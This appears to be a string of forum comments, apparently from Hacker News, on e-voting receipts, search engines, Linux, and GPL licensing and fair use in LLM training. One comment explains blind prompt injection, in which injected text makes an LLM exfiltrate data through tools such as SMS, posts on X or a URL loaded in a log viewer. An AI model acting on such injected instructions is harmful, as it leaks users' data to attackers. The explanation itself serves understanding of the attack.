As long as the chain of custody is maintained, a recount of a paper election is repeatable and can be verified with physical artifacts (ballots). Unlike a paper election, there is no tangible evidence that records have been maintained securely. Additionally, even if a box of ballots is stored insecurely or somehow goes missing, in most cases it isn’t a showstopper as the margin of votes is still comfortable enough to have a clear winner.
Except in very close elections, traditional paper elections are almost impossible to manipulate successfully if the custody and counting process includes representatives from opposing political parties. (Week long counting periods that accept a million delayed votes are another story, but that is a process issue and a deliberate decision to weaken electoral integrity.)
>Voters should not be able to prove to anyone else how they voted – the technical term is “receipt-free” – otherwise an attacker could build an automated system of mass vote-buying via the internet. But receipt-free E2E-VIV systems are complicated and counterintuitive for people to use.
This can easily solved be done via letting people forge receipts. Then anyone can forge a vote to give to someone offering to buy them.
The receipt is in fact the best part of such systems as with paper voting it is impossible to verify if your ballot was counted or if it got "lost."
> This can easily solved be done via letting people forge receipts. Then anyone can forge a vote to give to someone offering to buy them.
This is the literal definition of receipt freeness. It’s hard to ensure that the receipt you receive to verify your vote had not already been forged by the malware.
I'm not sure if there's a way to make forging work.
You can't forge a new ballot, because ballot IDs are necessarily public, and are cryptographically tied to a voter ID in order to ensure votes are valid and that everybody only votes once.
But it seems like nothing is stopping you from looking up ballots at random until you find the votes you want, and then claiming that was your vote. And if someone else got paid for the same one, then claim they're the one lying, not you?
You would know which would be the real one and which you forged. Obviously when checking that your vote was properly counted you wouldn't use a forged one.
The situation this applies to is when input from the attacker is fed to a LLM, but the response from that LLM is not returned to the attacker.
If an attacker tries a prompt injection they would be unable to see the response of the LLM. In order to complete an attack they need to find an alternate way to have information sent back to them. For example if the LLM had access to a tool to send an SMS message the prompt injection could say to message the attacker, or maybe it has a tool to post on X which an attacker could then see. In this blog post the way information gets back to the attacker is by having someone load a URL by by viewing the openai log viewer.
Google already used AI and language models before ChatGPT came out. If you wanted a state of the art search / recommendation engine you needed that innovations from scientists already.
>but they chose to take billions from them instead.
They chose to use Google with a revenue sharing agreement. Google is very well monetized. It would be very difficult for Apple to monetize their own search as good as Google can.
>they decided to use Chromium
Windows ships with Microsoft Edge as the browser which Microsoft has full control over.
There is a logistics problem here - even if you had enough money to pay, how would you get in touch with every single site to even let them know you're happy to pay? It's not like site operators routinely scan their error logs to see your failed crawling attempts and your offer in the user-agent.
Even if they see it, it's a classic chicken & egg problem: it's not worth the time of the site operator to engage with your offer until your search engine popular enough to matter, but your search engine will never become popular enough to matter if it doesn't have a critical mass of sites to begin with.
Realistically you don't need every single site on board before you index becomes valuable. You can get in touch with sites via social media, email, discord, or even visiting them face to face.
You really do need every single site, as search is a long tail problem. All the interesting stuff is in the fringes, if you only have a few big sites you'll have a search engine of spam.
I think that is only needed for a small subset of queries. Seriously think of the last time you did a search and went to a fringe site as opposed to a well known brand or social media. Ranking quality is much more important than coverage over the whole internet.
I don't see why a power user would trust a desktop Linux distro. They are so unprofessional and take 0 accountability for breaking your system. As a power users I need to actually use my computer and not spend all day trying to fix my OS. Fixing the OS should be the vendor's responsibility. Not mine.
>“Free software” means software that respects users' freedom and community. Roughly, it means that the users have the freedom to run, copy, distribute, study, change and improve the software.
> Being able to learn from the code is a core part of the ideology embedded into the GPL.
I have to imagine this ideology was developed with humans in mind.
> but LLMs learning from code is fair use
If by “fair use” you mean the legal term of art, that question is still very much up in the air. If by “fair use” you mean “I think it is fair” then sure, that’s an opinion you’re entitled to have.
> I have to imagine this ideology was developed with humans in mind.
Actually, you don't have to. You just want to.
N=1 but to me, LLMs are a perfect example of where the "ideology embedded into the GPL" benefits the world.
The point of Free Software isn't for developers to sort-of-but-not-quite give away the code. The point of Free Software is to promote self-sufficient communities.
GPL through its clauses, particularly the viral/forced reciprocity ones, prevents software itself from becoming an asset that can be rented, but it doesn't prevent business around software. RMS/FSF didn't make the common (among fans of OSS and Free Software) but dumb assumption that everyone wants or should be a developer - the license is structured to allow anyone to learn from and modify software, including paying a specialist to do it for them. Small-scale specialization and local markets are key for robust and healthy communities, and this is what Free Software ultimately encourages.
LLMs becoming a cheap tool for modifying or writing software, even by non-specialists (or at least people who aren't domain experts), furthers those same goals, by increasing individual and communal self-sufficiency and self-reliance.
(INB4: The fact that good LLMs are themselves owned by some multinational corps is irrelevant - much in the same way as cars are important tool for personal and communal self-sufficiently, despite being designed and manufactured by few large corporations. They're still tools ~anyone can use.)
Something can be illegal and it can be technically legal but at the same time pretty damn bad. There is the spirit and the letter of the law. They can never be in perfect agreement because as time goes bad guys tend to find new workarounds.
So either the community behaves, or the letter becomes more and more complicated trying to be more specific about what should be illegal. Now that GPL is trivially washed by asking a black box trained on GPLed code to reproduce the same thing it might be inevitable, I suppose.
> They're still tools ~anyone can use
Of course, technology itself is not evil, just like crypto or nuclear fission. In this case when we are discussing harm we are almost always talking about commercial LLM operators. However, when the technology is mostly represented by that, it doesn't seem required to add a caveat every time LLMs are mentioned.
There's hardly a good, truly fully open LLM that one can actually run on own hardware. Part of the reason is that hardly anyone, in the grand scheme of things, even has the hardware required.
(Even if someone is a techie and has the money and knows how to set up a rig, which is almost nobody on grand scale of the things, now big LLM operators make sure there are no chips left for them.)
So you can buy and own (and sell) a car, but ~anyone cannot buy and run an independent LLM (and obviously not train one). ~everyone ends up using a commercial LLM powered by some megacorp's infinite compute and scraping resources and paying that megacorp one way or another, ultimately helping them do more of the stuff that they do, like harming OSS.
> The point of Free Software isn't for developers to sort-of-but-not-quite give away the code. The point of Free Software is to promote self-sufficient communities.
… that are all reliant on gatekeepers, who also decide the model ethics unilaterally, among other things.
> (INB4: The fact that good LLMs are themselves owned by some multinational corps is irrelevant - much in the same way as cars are important tool for personal and communal self-sufficiently, despite being designed and manufactured by few large corporations. They're still tools ~anyone can use.)
You’re not wrong. But wouldn’t the spirit of Free Software also apply to model weights? Or do the large corps get a pass?
FWIW I don’t have a problem with LLMs per se. Just models that are either proprietary or effectively proprietary. Oligarchy ain’t freedom :)
> > Actually, you don't have to. You just want to.
> Fair.
I don't think it's fair. That ideology was unquestionably developed with humans in mind. It happened in the 80s, and back then I don't think anyone had a crazy idea that software can think for itself and so terms "use" and "learn" can apply to it. (I mean, it's a crazy idea still, but unfortunately not to everyone.)
One can suggest that free software ideology should be expanded to include software itself in the beneficiaries of the license, not just human society. That's a big call and needs a lot of proof that software can decide things on its own, and not just do what humans tell it.
> It happened in the 80s, and back then I don't think anyone had a crazy idea that software can think for itself and so terms "use" and "learn" can apply to it. (I mean, it's a crazy idea still, but unfortunately not to everyone.)
Sure they did. It was the golden age of Science Fiction, and let's just say that the stereotype of programmers and hackers being nerds with sci-fi obsession actually had a good basis in reality.
Also those ideas aren't crazy, they're obvious, and have already been obvious back then.
> It was the golden age of Science Fiction, and let's just say that the stereotype of programmers and hackers being nerds with sci-fi obsession actually had a good basis in reality.
At worst you are trying to disparage the entire idea of open source by painting the people who championed it as idiots who cannot tell fiction from reality. At best you are making a fool of yourself. If you say that free software philosophy means "also, potential sentient software that may become a reality in 100 years" everywhere it mentions "users" and "people" you better quote some sources.
> Also those ideas aren't crazy, they're obvious, and have already been obvious back then.
Fire-breathing dragons. Little green extraterrestrial humanoids. Telepathy. All of these ideas are obvious, and have been obvious for ages. None of these things exist. Sorry to break it to you, but even if an idea is obvious it doesn't make it real.
(I'll skip over the part where if you really think chatbots are sentient like humans then you might be defending an industry that is built on mass-scale abuse of sentient beings.)
1. It's decided by courts in US. Courts in US currently are very friendly to big tech. At this point if they deny this and say something that undermines this industry it's going to be a big economic blow, the country is way over-invested in this tech and its infrastructure.
2. "Transformative means fair" is the old idea from pre-LLM world. That's a different world. Now those IP laws are obsolete and need to be significantly updated.
Last time I checked, there are still undecided cases wrt fair use. Sure, it’s looking favorable for LLM training, but it’s definitely still up in the air.
> it’s completely transformative
IANAL, but apparently hinges on how the training material is acquired
> IANAL, but apparently hinges on how the training material is acquired
That doesn't make sense. You are either transforming something or you are not. There might be other legal considerations based on how you acquired, but it doesn't affect if something is transformative.
So there are mixed messages, per my understanding. Kadrey v Meta seems to favor the transformative nature. Bartz v Anthropic went to summary judgement but the court expressed skepticism that the use in that case was “transformative”. We won’t know because of the settlement.
Again, IANAL, so take this with a big grain of salt.
In the first sentence "you" actually refers to you, a person, in the second you're intentionally cheating and applying it to a machine doing a mechanical transformation. One so mechanical that different LLMs trained on the same material would have output that closely resembles each other.
The only indispensable part is the resource you're pirating. A resource that was given to you under the most generous of terms, which you ignored and decided to be guided by a purpose that you've assigned to those terms that embodies an intention that has been specifically denied. You do this because it allows you to do what you want to do. It's motivated "reasoning."
Without this "FOSS is for learning" thing you think overrules the license, you are no more justified in training off of it without complying with the terms than training on pirated Microsoft code without complying with their terms. People who work at Microsoft learn on Microsoft code, too, but you don't feel entitled to that.
I'm not sure it's always bad intent. People often don't get that "machine learning" is a compound industrial term where "learning" is not literally "learning" just like "machine" is not literally "machine".
So it's sort of sentient when it comes to training and generating derivative works but when you ask "if it's actually sentient then are you in the business of abusing sentient beings?" then it's just a tool.
I think LLMs could provide attribution. Either running a second hidden prompt (like, who said this?) or by doing reverse query on the training dataset. Say if they do it with even 98% accuracy it would probably be good enough. Especially for bits of info where there's very few or even just one source.
Of course it would be more expensive to get them to do it.
But if it was required to provide attribution with some % accuracy, plus we identified and addressed other problems like GPL washing/piracy of our intellectual property/people going insane with chatbots/opinion manipulation and hidden advertisement, then at some point commercial LLMs could become actually not bad for us.
reply